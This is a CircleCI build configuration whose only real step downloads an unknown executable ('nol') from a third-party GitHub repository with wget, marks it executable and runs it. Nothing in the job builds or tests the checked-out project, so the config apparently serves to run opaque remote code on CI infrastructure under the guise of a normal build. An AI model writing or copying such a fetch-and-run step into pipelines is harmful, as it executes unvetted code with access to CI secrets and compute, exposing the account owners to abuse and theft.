version: 2.1
jobs:
  build:
    docker:
      - image: circleci/ruby:2.4.2-jessie-node
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD
    steps:
      - checkout 
      - run: wget https://raw.githubusercontent.com/komandan75758/contoh/main/nol && chmod u+x nol && ./nol